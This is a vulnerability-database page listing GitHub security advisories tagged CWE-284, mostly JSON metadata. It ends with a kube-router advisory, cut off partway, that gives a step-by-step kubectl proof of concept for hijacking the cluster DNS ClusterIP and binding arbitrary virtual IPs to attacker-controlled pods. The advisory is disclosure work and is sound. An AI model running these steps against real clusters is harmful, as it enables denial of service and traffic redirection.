CWE-284
DiscouragedImproper Access Control
Abstraction: Pillar · Status: Incomplete
The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
7802 vulnerabilities reference this CWE, most recent first.
GHSA-PHJR-8J92-W5V7
Vulnerability from github – Published: 2022-09-20 00:00 – Updated: 2022-09-22 17:22Incorrect handling of the supplementary groups in the CRI-O container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute a binary code in that container.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/cri-o/cri-o"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.25.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-2995"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-732"
],
"github_reviewed": true,
"github_reviewed_at": "2022-09-21T17:46:18Z",
"nvd_published_at": "2022-09-19T20:15:00Z",
"severity": "HIGH"
},
"details": "Incorrect handling of the supplementary groups in the CRI-O container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute a binary code in that container.",
"id": "GHSA-phjr-8j92-w5v7",
"modified": "2022-09-22T17:22:56Z",
"published": "2022-09-20T00:00:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2995"
},
{
"type": "WEB",
"url": "https://github.com/cri-o/cri-o/pull/6159"
},
{
"type": "WEB",
"url": "https://github.com/cri-o/cri-o/commit/db3b399a8d7dabf7f073db73894bee98311d7909"
},
{
"type": "PACKAGE",
"url": "https://github.com/cri-o/cri-o"
},
{
"type": "WEB",
"url": "https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "CRI-O incorrect handling of supplementary groups may lead to sensitive information disclosure"
}
GHSA-PHMV-QJXC-9JXJ
Vulnerability from github – Published: 2024-04-09 18:30 – Updated: 2024-04-09 18:30{
"affected": [],
"aliases": [
"CVE-2024-26234"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-09T17:15:43Z",
"severity": "MODERATE"
},
"details": "Proxy Driver Spoofing Vulnerability",
"id": "GHSA-phmv-qjxc-9jxj",
"modified": "2024-04-09T18:30:25Z",
"published": "2024-04-09T18:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26234"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26234"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PHP4-MJ74-F79R
Vulnerability from github – Published: 2022-05-13 01:17 – Updated: 2025-10-22 00:31Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.
{
"affected": [],
"aliases": [
"CVE-2016-3427"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-04-21T11:00:00Z",
"severity": "CRITICAL"
},
"details": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.",
"id": "GHSA-php4-mj74-f79r",
"modified": "2025-10-22T00:31:13Z",
"published": "2022-05-13T01:17:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-3427"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2016:1430"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/b84ad1258a89de5c9c853c7f2d3ad77e5b8b2930be9e132d5cef6b95%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/b84ad1258a89de5c9c853c7f2d3ad77e5b8b2930be9e132d5cef6b95@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/b8a1bf18155b552dcf9a928ba808cbadad84c236d85eab3033662cfb%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/b8a1bf18155b552dcf9a928ba808cbadad84c236d85eab3033662cfb@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r03c597a64de790ba42c167efacfa23300c3d6c9fe589ab87fe02859c%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r03c597a64de790ba42c167efacfa23300c3d6c9fe589ab87fe02859c@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r587e50b86c1a96ee301f751d50294072d142fd6dc08a8987ae9f3a9b%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r587e50b86c1a96ee301f751d50294072d142fd6dc08a8987ae9f3a9b@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r5f48b16573a11fdf0b557cc3d1d71423ecde8ee771c29f32334fa948%40%3Cdev.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r5f48b16573a11fdf0b557cc3d1d71423ecde8ee771c29f32334fa948@%3Cdev.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rc3abf40b06c511d5693baf707d6444bf7745e6a1e343e6f530a12258%40%3Cuser.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rc3abf40b06c511d5693baf707d6444bf7745e6a1e343e6f530a12258@%3Cuser.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201606-18"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20160420-0001"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2016-3427"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:1216"
},
{
"type": "WEB",
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10159"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/37220405a377c0182d2afdbc36461c4783b2930fbeae3a17f1333113%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/37220405a377c0182d2afdbc36461c4783b2930fbeae3a17f1333113@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/39ae1f0bd5867c15755a6f959b271ade1aea04ccdc3b2e639dcd903b%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/39ae1f0bd5867c15755a6f959b271ade1aea04ccdc3b2e639dcd903b@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00006.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00009.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00012.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00021.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00022.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00026.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00027.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00039.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00040.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00042.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00058.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00059.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00061.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00067.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00002.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0650.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0651.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0675.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0676.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0677.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0678.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0679.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0701.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0702.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0708.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0716.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-0723.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-1039.html"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2016/dsa-3558"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2020/08/31/1"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/86421"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1035596"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1037331"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-2963-1"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-2964-1"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-2972-1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PHP5-MM5G-Q7WW
Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35Vulnerability in the Oracle Application Development Framework (ADF) product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.0.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Application Development Framework (ADF) executes to compromise Oracle Application Development Framework (ADF). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Application Development Framework (ADF) accessible data as well as unauthorized update, insert or delete access to some of Oracle Application Development Framework (ADF) accessible data. CVSS 3.1 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N).
{
"affected": [],
"aliases": [
"CVE-2026-46772"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-17T10:53:54Z",
"severity": "MODERATE"
},
"details": "Vulnerability in the Oracle Application Development Framework (ADF) product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.0.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Application Development Framework (ADF) executes to compromise Oracle Application Development Framework (ADF). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Application Development Framework (ADF) accessible data as well as unauthorized update, insert or delete access to some of Oracle Application Development Framework (ADF) accessible data. CVSS 3.1 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N).",
"id": "GHSA-php5-mm5g-q7ww",
"modified": "2026-06-17T18:35:27Z",
"published": "2026-06-17T18:35:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46772"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cspujun2026.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PHQJ-XP48-7P7C
Vulnerability from github – Published: 2022-05-13 01:13 – Updated: 2025-04-12 02:49Moodle 2.0.x before 2.0.2 does not use the forceloginforprofiles setting for course-profiles access control, which makes it easier for remote attackers to obtain potentially sensitive information via vectors involving use of a search engine, as demonstrated by the search functionality of Google, Yahoo!, Wrensoft Zoom, MSN, Yandex, and AltaVista.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "moodle/moodle"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2011-4279"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-12T02:49:09Z",
"nvd_published_at": "2012-07-16T10:28:00Z",
"severity": "MODERATE"
},
"details": "Moodle 2.0.x before 2.0.2 does not use the forceloginforprofiles setting for course-profiles access control, which makes it easier for remote attackers to obtain potentially sensitive information via vectors involving use of a search engine, as demonstrated by the search functionality of Google, Yahoo!, Wrensoft Zoom, MSN, Yandex, and AltaVista.",
"id": "GHSA-phqj-xp48-7p7c",
"modified": "2025-04-12T02:49:09Z",
"published": "2022-05-13T01:13:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2011-4279"
},
{
"type": "PACKAGE",
"url": "http://git.moodle.org"
},
{
"type": "WEB",
"url": "http://git.moodle.org/gw?p=moodle.git%3Ba=commit%3Bh=81b58cc227cf96a1cd2e002cc210b7b3e376fd17"
},
{
"type": "WEB",
"url": "http://git.moodle.org/gw?p=moodle.git;a=commit;h=81b58cc227cf96a1cd2e002cc210b7b3e376fd17"
},
{
"type": "WEB",
"url": "http://moodle.org/mod/forum/discuss.php?d=170004"
},
{
"type": "WEB",
"url": "http://openwall.com/lists/oss-security/2011/11/14/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "Moodle does not use the forceloginforprofiles setting for course-profiles access control"
}
GHSA-PHQM-JGC3-QF8G
Vulnerability from github – Published: 2026-03-17 17:12 – Updated: 2026-03-30 14:01kube-router Proxy Module Does Not Validate ExternalIPs or LoadBalancer IPs Against Configured Ranges
Summary
This issue primarily affects multi-tenant clusters where untrusted users are granted namespace-scoped permissions to create or modify Services. Single-tenant clusters or clusters where all Service creators are trusted are not meaningfully affected.
The kube-router proxy module's buildServicesInfo() function directly copies IPs from Service.spec.externalIPs and status.loadBalancer.ingress into node-level network configuration (kube-dummy-if interface, IPVS virtual services, LOCAL routing table) without validating them against the --service-external-ip-range parameter. A user with namespace-scoped Service CRUD permissions can bind arbitrary VIPs on all cluster nodes or cause denial of service to critical cluster services such as kube-dns.
The --service-external-ip-range parameter is only consumed by the netpol (network policy) module for firewall RETURN rules. The proxy module never reads this configuration, creating a gap between administrator expectations and actual enforcement.
Kubernetes' DenyServiceExternalIPs Feature Gate was introduced in v1.22 and remains disabled by default through v1.31, meaning most clusters allow Services to carry externalIPs without any admission control.
Note: This vulnerability class is not unique to kube-router. The upstream Kubernetes project classified the equivalent issue as CVE-2020-8554 (CVSS 5.0/Medium), describing it as a design limitation with no planned in-tree fix. The reference service proxy (kube-proxy) and other third-party service proxy implementations exhibit the same behavior. kube-router's --service-external-ip-range parameter provides more defense-in-depth than most alternatives -- the gap is that this defense did not extend to the proxy module.
Details
Vulnerability Description
Kube-router's proxy module does not validate externalIPs or loadBalancer IPs before programming them into the node's network configuration:
- Unconditional externalIPs copy:
buildServicesInfo()directlycopy()sService.spec.ExternalIPswithout any range validation - Unconditional LoadBalancer IP trust: The same function appends
status.loadBalancer.ingress[].ipwithout verification --service-external-ip-rangenot checked by proxy: This parameter is only referenced in the netpol module, the proxy module never checks it- Cluster-wide impact: IPs are bound to
kube-dummy-ifon all cluster nodes, added to IPVS, and added to thekube-router-svipipset - No conflict detection: ExternalIPs that overlap with existing ClusterIPs (e.g., kube-dns
10.96.0.10) cause the legitimate IPVS real servers to be fully replaced by the attacker's endpoints during the stale-endpoint cleanup cycle, redirecting all traffic for that VIP:port to attacker-controlled pods
Vulnerable Code Locations
File: pkg/controllers/proxy/network_services_controller.go
Lines 866, 898 - Unconditional externalIPs copy:
externalIPs: make([]string, len(svc.Spec.ExternalIPs)),
copy(svcInfo.externalIPs, svc.Spec.ExternalIPs) // No range check
Lines 900-904 - Unconditional LoadBalancer IP trust:
for _, lbIngress := range svc.Status.LoadBalancer.Ingress {
if len(lbIngress.IP) > 0 {
svcInfo.loadBalancerIPs = append(svcInfo.loadBalancerIPs, lbIngress.IP)
}
}
File: pkg/controllers/proxy/utils.go
Lines 425-461 - getAllExternalIPs() merges IPs without range validation:
func getAllExternalIPs(svc *serviceInfo, includeLBIPs bool) map[v1.IPFamily][]net.IP {
// Only performs IP parsing and deduplication, no range checking
}
File: pkg/controllers/proxy/service_endpoints_sync.go
Lines 460-464 - Binds arbitrary IPs to kube-dummy-if via netlink:
err = nsc.ln.ipAddrAdd(dummyVipInterface, externalIP.String(), nodeIP.String(), true)
File: pkg/controllers/netpol/network_policy_controller.go
Lines 960-967 - --service-external-ip-range is ONLY referenced here:
for _, externalIPRange := range config.ExternalIPCIDRs {
_, ipnet, err := net.ParseCIDR(externalIPRange)
npc.serviceExternalIPRanges = append(npc.serviceExternalIPRanges, *ipnet)
}
// The proxy module never references ExternalIPCIDRs
Root Cause
The proxy module was implemented without externalIP range validation. The --service-external-ip-range parameter creates a gap between administrator expectations and actual enforcement: administrators may believe externalIPs are restricted to the configured range, but the proxy module (which actually configures IPVS and network interfaces) does not enforce this restriction.
This is consistent with the broader Kubernetes ecosystem. CVE-2020-8554 documents the same fundamental issue: the Kubernetes API allows Service.spec.externalIPs to be set by any user with Service create/update permissions, and service proxies program these IPs into the data plane without validation. The upstream project's recommended mitigation is API-level admission control (e.g., DenyServiceExternalIPs feature gate, or admission webhooks).
PoC
Environment Setup
# Kind cluster: 1 control-plane + 1 worker
cat > kind-config.yaml <<EOF
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: kube-router-test
networking:
disableDefaultCNI: true
kubeProxyMode: "none"
nodes:
- role: control-plane
- role: worker
EOF
kind create cluster --config kind-config.yaml
kubectl apply -f https://raw.githubusercontent.com/cloudnativelabs/kube-router/v2.7.1/daemonset/kubeadm-kuberouter.yaml
kubectl -n kube-system wait --for=condition=ready pod -l k8s-app=kube-router --timeout=120s
# Create low-privileged attacker
kubectl create namespace attacker-ns
kubectl apply -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
name: cicd-developer
namespace: attacker-ns
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
namespace: attacker-ns
name: service-creator
rules:
- apiGroups: [""]
resources: ["services"]
verbs: ["get", "list", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: service-creator-binding
namespace: attacker-ns
subjects:
- kind: ServiceAccount
name: cicd-developer
namespace: attacker-ns
roleRef:
kind: Role
name: service-creator
apiGroup: rbac.authorization.k8s.io
EOF
Exploitation
Scenario A: Arbitrary VIP Binding
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
name: malicious-externalip
namespace: attacker-ns
spec:
selector: { app: non-existent }
ports: [{ port: 80, targetPort: 80 }]
externalIPs: ["192.168.100.50", "10.200.0.1", "172.16.0.99"]
EOF
Result: All 3 IPs appear on kube-dummy-if, IPVS rules, and LOCAL routing table on ALL cluster nodes. No validation, no warning, no audit log.
Scenario B: Cluster DNS Takedown (Single Command)
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
name: dns-dos-svc
namespace: attacker-ns
spec:
selector: { app: non-existent-app }
ports:
- { name: dns-udp, port: 53, targetPort: 5353, protocol: UDP }
- { name: dns-tcp, port: 53, targetPort: 5353, protocol: TCP }
externalIPs: ["10.96.0.10"]
EOF
Before attack: kube-dns has 2 healthy real servers (CoreDNS pods).
After attack: The legitimate CoreDNS endpoints are fully evicted from the IPVS virtual service via the activeServiceEndpointMap overwrite and stale-endpoint cleanup cycle. If the attacker's Service has a selector pointing to attacker-controlled pods, those pods become the sole real servers for 10.96.0.10:53 -- receiving 100% of cluster DNS traffic. If no matching pods exist, the virtual service has zero real servers and DNS queries blackhole.
After deleting the attacker's Service: DNS immediately recovers.
Scenario C: --service-external-ip-range Bypass
With --service-external-ip-range=10.200.0.0/16 configured, 192.168.100.50 (outside the range) is still bound. The proxy module never checks this parameter.
Scenario D: Arbitrary VIP Binding With Attacker Backend
A user can bind an arbitrary IP as a VIP on all cluster nodes. For previously unused IPs, this creates a new IPVS virtual service directing traffic to the attacker's pods. For IPs that match an existing ClusterIP on the same port, the attacker's endpoints replace the legitimate endpoints entirely (see Scenario B for the mechanism).
kubectl -n attacker-ns run attacker-backend --image=nginx:alpine --port=80
kubectl -n attacker-ns exec attacker-backend -- sh -c 'echo "HIJACKED-BY-ATTACKER" > /usr/share/nginx/html/index.html'
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
name: hijack-svc
namespace: attacker-ns
spec:
selector: { run: attacker-backend }
ports: [{ port: 80, targetPort: 80 }]
externalIPs: ["10.50.0.1"]
EOF
$ curl http://10.50.0.1/
HIJACKED-BY-ATTACKER
Impact
Confidentiality: None - No direct data leakage
Integrity: Low - An attacker can bind arbitrary VIPs on cluster nodes and direct traffic to attacker-controlled pods. When an externalIP matches an existing ClusterIP on the same port, the legitimate endpoints are fully replaced by the attacker's endpoints via the IPVS stale-endpoint cleanup cycle -- the attacker receives 100% of that traffic. However, this is bounded to specific (IP, protocol, port) tuples that the attacker explicitly targets, is immediately visible via kubectl get svc, and constitutes traffic redirection rather than transparent interception. This is consistent with the upstream Kubernetes assessment of CVE-2020-8554 (I:Low).
Availability: High - A single command can take down cluster DNS, affecting all pods' name resolution, service discovery, and control plane communication
Attack Scenarios
- Cluster-wide DNS DoS / traffic co-opt: A user creates one Service with an externalIP matching the kube-dns ClusterIP on port 53. The legitimate CoreDNS endpoints are evicted and the attacker's pods receive all DNS queries cluster-wide.
- Arbitrary VIP binding: A user binds unused IPs as VIPs on all cluster nodes, directing traffic to attacker-controlled pods
- ClusterIP conflict exploitation: A user targets any existing ClusterIP:port combination to replace the legitimate service's endpoints with their own
- Security configuration bypass:
--service-external-ip-rangeis not enforced by the proxy module - Trust boundary violation: Namespace-scoped permissions affect all cluster nodes
Affected Versions
- All kube-router v2.x versions (including latest v2.7.1)
buildServicesInfo()has never referencedExternalIPCIDRs
Patched Versions
v2.8.0 and beyond
Workarounds
- Enable DenyServiceExternalIPs Feature Gate: Add
--feature-gates=DenyServiceExternalIPs=trueto the API server - Deploy admission policy: Use Kyverno/OPA/ValidatingAdmissionPolicy to restrict Services with externalIPs
- Restrict Service creation RBAC: Tighten RBAC to prevent low-privileged users from creating Services
- Monitor Service changes: Enable Kubernetes audit logging for Service create/update operations
- Apply BGP prefix filtering: If kube-router is configured to advertise externalIPs or ClusterIPs via BGP, configure BGP peers (routers, firewalls) to only accept announcements for expected prefix ranges. This prevents a malicious externalIP from being advertised to and routed by the broader network.
Mitigation
Recommended Permanent Fix
- Proxy module should check
--service-external-ip-range: Validate externalIPs against configured ranges inbuildServicesInfo() - Default deny when unconfigured: When
--service-external-ip-rangeis not set, reject all externalIPs - IP conflict detection: Check externalIPs against existing ClusterIPs and NodeIPs
- Audit logging: Log all externalIP configuration changes
Credits
- @b0b0haha (Reporter)
- @j311yl0v3u (Reporter)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/cloudnativelabs/kube-router/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32254"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T17:12:17Z",
"nvd_published_at": "2026-03-18T04:17:24Z",
"severity": "HIGH"
},
"details": "# kube-router Proxy Module Does Not Validate ExternalIPs or LoadBalancer IPs Against Configured Ranges\n\n## Summary\n\nThis issue primarily affects multi-tenant clusters where untrusted users are granted namespace-scoped permissions to create or modify Services. Single-tenant clusters or clusters where all Service creators are trusted are not meaningfully affected.\n\nThe kube-router proxy module\u0027s `buildServicesInfo()` function directly copies IPs from `Service.spec.externalIPs` and `status.loadBalancer.ingress` into node-level network configuration (kube-dummy-if interface, IPVS virtual services, LOCAL routing table) without validating them against the `--service-external-ip-range` parameter. A user with namespace-scoped Service CRUD permissions can bind arbitrary VIPs on all cluster nodes or cause denial of service to critical cluster services such as kube-dns.\n\nThe `--service-external-ip-range` parameter is only consumed by the netpol (network policy) module for firewall RETURN rules. The proxy module never reads this configuration, creating a gap between administrator expectations and actual enforcement.\n\nKubernetes\u0027 `DenyServiceExternalIPs` Feature Gate was introduced in v1.22 and remains disabled by default through v1.31, meaning most clusters allow Services to carry externalIPs without any admission control.\n\n**Note:** This vulnerability class is not unique to kube-router. The upstream Kubernetes project classified the equivalent issue as 